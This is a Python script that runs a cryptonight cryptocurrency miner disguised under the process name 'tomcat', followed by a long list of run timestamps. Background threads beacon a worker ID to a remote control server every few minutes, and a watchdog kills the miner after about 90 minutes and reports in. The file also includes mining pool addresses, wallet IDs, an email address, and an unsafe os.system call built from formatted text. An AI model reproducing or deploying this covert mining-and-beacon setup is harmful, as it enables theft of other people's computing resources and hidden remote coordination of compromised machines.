import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:11:03.607925
#2018-02-17 15:59:03.292336
#2018-02-17 17:47:05.742486
#2018-02-17 19:34:01.488271
#2018-02-17 21:22:06.141269
#2018-02-17 23:06:01.983144
#2018-02-18 00:54:01.230254
#2018-02-18 02:42:04.151795
#2018-02-18 04:31:05.214532
#2018-02-18 06:22:07.417079
#2018-02-18 08:12:01.816242
#2018-02-18 09:59:04.130666
#2018-02-18 11:46:06.689783
#2018-02-18 13:30:06.918442
#2018-02-18 15:20:08.541008
#2018-02-18 17:09:07.423928
#2018-02-18 18:57:04.868829
#2018-02-18 20:43:05.717127
#2018-02-18 22:28:03.573712
#2018-02-19 00:17:05.610839
#2018-02-19 02:03:05.192601
#2018-02-19 03:49:08.045128
#2018-02-19 05:34:07.794813
#2018-02-19 07:22:07.638571
#2018-02-19 09:13:07.973801
#2018-02-19 11:04:05.736180
#2018-02-19 12:51:05.916487
#2018-02-19 14:40:10.516807
#2018-02-19 16:27:09.037759
#2018-02-19 18:14:02.136501
#2018-02-19 20:01:07.408351
#2018-02-19 21:51:04.442651
#2018-02-19 23:37:07.320060
#2018-02-20 01:23:06.503688
#2018-02-20 03:13:04.432743
#2018-02-20 05:00:08.190227
#2018-02-20 06:44:05.710360
#2018-02-20 08:31:01.764567
#2018-02-20 10:15:10.918226
#2018-02-20 11:59:08.028940
#2018-02-20 13:47:02.166279
#2018-02-20 15:30:09.014503
#2018-02-20 17:15:12.014819
#2018-02-20 19:06:07.933251
#2018-02-20 20:55:08.878458
#2018-02-20 22:39:02.030603
#2018-02-21 00:22:05.621197
#2018-02-21 02:07:06.632232
#2018-02-21 03:56:02.024697
#2018-02-21 05:45:07.281635
#2018-02-21 07:33:03.588685
#2018-02-21 09:18:07.136091
#2018-02-21 11:07:08.100188
#2018-02-21 12:54:07.084478
#2018-02-21 14:41:08.146157
#2018-02-21 16:29:05.806496
#2018-02-21 18:20:06.941915
#2018-02-21 20:07:06.138367
#2018-02-21 21:55:01.405231
#2018-02-21 23:43:07.160990
#2018-02-22 01:32:03.621876
#2018-02-22 03:19:07.521690
#2018-02-22 05:07:01.757237
#2018-02-22 06:51:07.300654
#2018-02-22 08:38:08.015195
#2018-02-22 10:25:01.622021
#2018-02-22 12:11:12.196849
#2018-02-22 13:58:10.096341
#2018-02-22 15:45:13.626106
#2018-02-22 17:34:02.119049
#2018-02-22 19:22:05.014445
#2018-02-22 21:14:01.693249
#2018-02-22 22:59:04.262999
#2018-02-23 00:46:01.296268
#2018-02-23 02:33:07.036051
#2018-02-23 04:22:02.087845
#2018-02-23 06:09:06.740812
#2018-02-23 07:54:05.658010
#2018-02-23 10:13:04.939269
#2018-02-23 12:06:08.782048
#2018-02-23 13:55:07.910270
#2018-02-23 15:46:07.528240
#2018-02-23 17:32:08.501136
#2018-02-23 19:19:03.918488
#2018-02-23 21:03:05.378436
#2018-02-23 22:47:01.960800
#2018-02-24 00:34:01.496894
#2018-02-24 02:24:08.328003
#2018-02-24 04:13:01.311372
#2018-02-24 06:00:10.215454
#2018-02-24 07:48:06.185013
#2018-02-24 09:32:08.089098
#2018-02-24 11:26:01.971432
#2018-02-24 13:15:04.274641
#2018-02-24 15:06:01.574955
#2018-02-24 16:54:05.809962
#2018-02-24 18:42:01.497421
#2018-02-24 20:31:01.242726
#2018-02-24 22:29:03.996497
#2018-02-25 01:39:02.182182
#2018-02-25 05:08:07.083399
#2018-02-25 10:25:02.844405